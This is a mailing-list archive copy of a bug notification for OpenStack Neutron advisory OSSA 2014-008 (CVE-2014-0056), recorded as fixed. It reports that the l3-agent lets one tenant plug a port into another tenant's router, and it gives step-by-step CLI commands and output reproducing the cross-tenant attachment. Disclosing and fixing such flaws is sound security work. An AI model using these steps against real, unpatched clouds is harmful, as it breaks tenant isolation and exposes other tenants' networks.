yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #25536
[Bug 1243327] Re: [OSSA 2014-008] Routers can be cross plugged by other tenants (CVE-2014-0056)
** No longer affects: neutron/grizzly
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1243327
Title:
[OSSA 2014-008] Routers can be cross plugged by other tenants
(CVE-2014-0056)
Status in OpenStack Neutron (virtual network service):
Fix Released
Status in neutron havana series:
Fix Released
Status in OpenStack Security Advisories:
Fix Released
Bug description:
The l3-agent does not check tenant_id and allows for tenants to be
able to plug ports into other's routers if the device_id is set to
another tenants router.
# become admin tenant
arosen@arosen-desktop:~/devstack$ source openrc admin admin
# Create router as admin:
arosen@arosen-desktop:~/devstack$ neutron router-create admin-router
Created a new router:
+-----------------------+--------------------------------------+
| Field | Value |
+-----------------------+--------------------------------------+
| admin_state_up | True |
| external_gateway_info | |
| id | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 |
| name | admin-router |
| status | ACTIVE |
| tenant_id | 04e94acfe69f4960a69c6a78d39466c4 |
+-----------------------+--------------------------------------+
# Become demo tenant
arosen@arosen-desktop:~/devstack$ source openrc demo demo
#create port with correct device_id and device_owner
arosen@arosen-desktop:~/devstack$ neutron port-create private --device-id 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 --device-owner network:router_interface
Created a new port:
+-----------------------+---------------------------------------------------------------------------------+
| Field | Value |
+-----------------------+---------------------------------------------------------------------------------+
| admin_state_up | True |
| allowed_address_pairs | |
| device_id | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 |
| device_owner | network:router_interface |
| fixed_ips | {"subnet_id": "5786a0a6-24c8-4156-b981-cc817011c6a7", "ip_address": "10.0.0.3"} |
| id | 895cf428-4bfb-4c79-86c2-d40af9bf3587 |
| mac_address | fa:16:3e:21:33:6c |
| name | |
| network_id | 4de8b4f6-ac11-4836-aefb-7ed4f49ab9a7 |
| security_groups | |
| status | DOWN |
| tenant_id | ad069ea620614cce9c4b6f088d39d03e |
+-----------------------+---------------------------------------------------------------------------------+
Now when the l3-agent is restarted or enters its periodic sync state:
arosen@arosen-desktop:~/devstack$ sudo ip netns exec qrouter-80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
qr-895cf428-4b Link encap:Ethernet HWaddr fa:16:3e:21:33:6c
inet addr:10.0.0.3 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::f816:3eff:fe21:336c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:300 (300.0 B) TX bytes:398 (398.0 B)
To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1243327/+subscriptions